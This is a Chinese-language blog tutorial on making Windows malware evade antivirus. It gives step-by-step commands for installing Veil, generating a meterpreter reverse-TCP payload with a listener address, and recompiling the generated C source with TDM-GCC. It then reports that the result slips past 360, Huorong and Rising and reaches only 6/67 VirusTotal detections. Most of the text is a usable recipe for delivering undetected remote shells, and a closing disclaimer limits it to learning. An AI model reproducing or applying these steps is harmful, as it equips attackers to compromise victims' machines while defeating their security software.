Veil+tdm-gcc免杀360火绒瑞星

Veil-Evasion是一个用python写的免杀框架，可以将任意脚本或一段shellcode转换成Windows可执行文件，还能利用Metasploit框架生成相兼容的Payload工具，从而逃避了常见防病毒产品的检测。

0x00 Veil安装

我是直接在kail下面安装的

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

0x01 Veil使用

veil有两个免杀的工具，Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode，Evasion是用做文件免杀。

我们一般选择Evasion

Veil>: use Evasion
# use <id | name> 进入或使用当前可以使用的tool或者payload

列出payload

Veil/Evasion>: list
# list 列出当前可以使用的tool或者payload

选择使用 c/meterpreter/rev_tcp.py

Veil/Evasion>: use 7
#设置 需要IP和端口
[c/meterpreter/rev_tcp>>]: set lhost 192.168.190.131
[c/meterpreter/rev_tcp>>]: set lport 4444
#生产payload
[c/meterpreter/rev_tcp>>]: generate
#payload命名C01
[>] Please enter the base name for output files (default is payload): C01

源码: /var/lib/veil/output/source/C01.c
生成的exe ：/var/lib/veil/output/compiled/C01.exe

0x02 Veil原生C01.exe 执行测试

说明：
192.168.190.1 安装瑞星和火绒

192.168.190.129安装360杀毒和360安全卫士

开启msf，设置好监听

在192.168.190.1上点击下载瞬间被火绒检测报毒

在192.168.190.129上点击下载并检测无异常

尝试执行
成功上线了一会后被杀，躲过了静态，没躲过动态

0x03 tdm-gcc

tdm-gcc下载地址：https://jmeubank.github.io/tdm-gcc/

TDM-GCC是一款适用于windows平台的gcc编译工具，主要适用于c语言开发者使用，软件集合了GCC 工具集中最新的稳定发行版本，包含了丰富实用的开发工具供开发者使用，安装后就可以正常使用

0x04 使用tdm-gcc编译生成 C02.exe 执行测试

/var/lib/veil/output/source/C01.c编译生成C02.exe

gcc C02.c -o C02.exe -lwsock32

在 192.168.190.129上执行

执行C02.exe成功上线

将C02.exe复制到192.168.190.1
瑞星和火绒均未检测出风险

执行
成功上线

virustotal.com中6/67个报毒

综上所诉，Veil+tdm-gcc达到的免杀效果还是不错的

仅用于学习交流，不得用于非法用途
如侵权请私聊博主删文